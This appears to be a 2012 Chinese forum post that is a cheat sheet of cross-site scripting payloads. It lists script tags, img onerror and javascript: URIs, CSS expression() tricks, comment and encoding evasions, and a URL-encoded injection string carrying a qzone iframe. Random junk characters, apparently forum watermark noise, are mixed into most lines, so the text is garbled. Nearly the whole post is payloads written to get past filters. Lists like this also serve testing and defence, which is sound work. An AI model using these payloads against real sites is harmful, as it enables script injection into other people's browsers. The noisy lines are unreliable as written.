<script>alert("跨站")</script> (最常用)
) z$ D ?5 s1 W) Y. ^<img scr=javascript:alert("跨站")></img> L$ g$ u2 y9 J
<img scr="javascript: alert(/跨站/)></img>
0 f7 y; X# f/ u% x<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
! i+ ]; u9 X( ]7 z% @<img scr="#" onerror=alert(/跨站/)></img>" p$ D5 S. E" U5 j0 S# O" u5 y
<img scr="#" style="xss:expression(alert(/xss/));"></img>
% W& W8 a$ o3 h& u( \1 d8 v<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)$ S! f' @- v9 t; j9 J
<img src=vbscript:msgbox ("xss")></img>* j& o9 I4 t) J. f" h" h
<style> input {left:expression (alert('xss'))}</style>- s) U/ n; S$ ]9 O* X
<div style={left:expression (alert('xss'))}></div>
( Y \7 t% x3 a) A7 u0 B% |$ i" I3 o<div style={left:exp/* */ression (alert('xss'))}></div>) t4 ^, a# l6 ?9 k$ N
<div style={left:\0065\0078ression (alert('xss'))}></div>% ]& m# U1 x* `, ]. O; D% ~
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>. V9 j6 I, c# x% e$ t% T2 C
unicode <div style="{left:expRessioN (alert('xss'))}">" |# ~0 ^( Z& d6 N5 g b2 S
- Q. i) `0 g& y/ d"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
6 X. z3 r0 l" ] |
发表于 2012-9-13 17:15:04
收藏
支持
反对